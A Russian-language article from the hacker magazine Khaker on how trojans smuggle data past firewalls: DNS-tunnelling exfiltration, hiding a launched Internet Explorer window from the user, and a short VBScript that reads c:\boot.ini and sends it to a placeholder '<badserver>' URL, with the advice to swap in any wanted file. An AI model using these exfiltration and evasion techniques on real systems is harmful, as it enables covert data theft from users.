Защита снаружи и изнутри

(c)oded by Lame@pochta.ru

Спецвыпуск: Хакер, номер #048, стр. 048-096-4

Есть несколько методов внедрения в адресное пространство других процессов (подробнее об этом читай в статьей "Игра в прятки"). Один из них – подмена API и DLL Injection. Этот метод широко используется rootkits для Windows. Недавно на сайте www.xakep.ru была опубликована статья о реализации этого метода на Delphi (www.xakep.ru/post/23288/default.asp). А по адресу www.forum.sources.ru/index.php?showtopic=48014 смотри перевод статьи Holy Father, создателя известного инструмента Hacker Defender. Внедрение в процессы подробно и с примерами описано в статье rattle, опубликованной в свежем Phrack (www.phrack.org/show.php?p=62&a=13). Там же есть исходник приложения, внедряющегося в запущенный IE и уже в его контексте работающий с сетью.

Однако, как говорилось, подобные методы требуют, чтобы троян был запущен с правами администратора, что не всегда возможно. Два последних метода (использование служебных протоколов и использование доверенных приложений для утечки данных) лишены этого недостатка.

Использование служебных протоколов и доверенных приложений для утечки данных

Использование служебных протоколов позволяет «выводить» данные с атакуемого компьютера через те сетевые службы, которые обычно не фильтруются межсетевыми экранами. Например, троянская программа запускает команду ping deww2362hewuiw.megahackersuper.wherehere.ru. Windows посылает DNS запрос на разрешение имени в IP-адрес. Межсетевой экран пропускает этот запрос. На приемной стороне стоит «специализированный» сервер DNS, отвечающий за зону megahackersuper.wherehere.ru, который извлекает из имени (deww2362hewuiw) полезные данные и возвращает в ответе команды трояну. В результате имеем канал утечки. Еще один интересный способ – запустить Internet Explorer и попросить его передать данные во внешний мир. Но здесь возникает одна проблема – IE надо запускать в скрытом режиме, чтобы пользователя не удивляли непонятные окна на рабочем столе, занимающиеся своими делами.

Но большинство экранов знают об этой возможности и перехватывают запуск приложений с типом отображения SW_HIDE. Есть один нехитрый способ обойти подобную защиту – запустить IE в нормально режиме, после чего сразу же послать окну команду SW_HIDE. Если все делать оперативно, пользователь ничего не заметит.

А как же Internet Explorer будет копировать с жесткого диска ценную информацию? Для этого можно воспользоваться сценариями. Посмотри на пример:

<script>

Set fso = CreateObject("Scripting.FileSystemObject")

Set f = fso.OpenTextFile("c:\\boot.ini", 1, False)

While Not f.atEndOfStream

s = f.ReadLine

ss=ss+"<br> "+s

Wend

document.location.href="http://<badserver> /getfile.asp?"&ss

</script>

Эта небольшая программа считывает с жесткого диска содержимое файла boot.ini и передает его на <badserver> , используя тот же экземпляр браузера, в котором выполняется. Пример такого трояна можно найти в статье на www.securitylab.ru/46765.html. Подправь boot.ini на нужный файл, и вперед.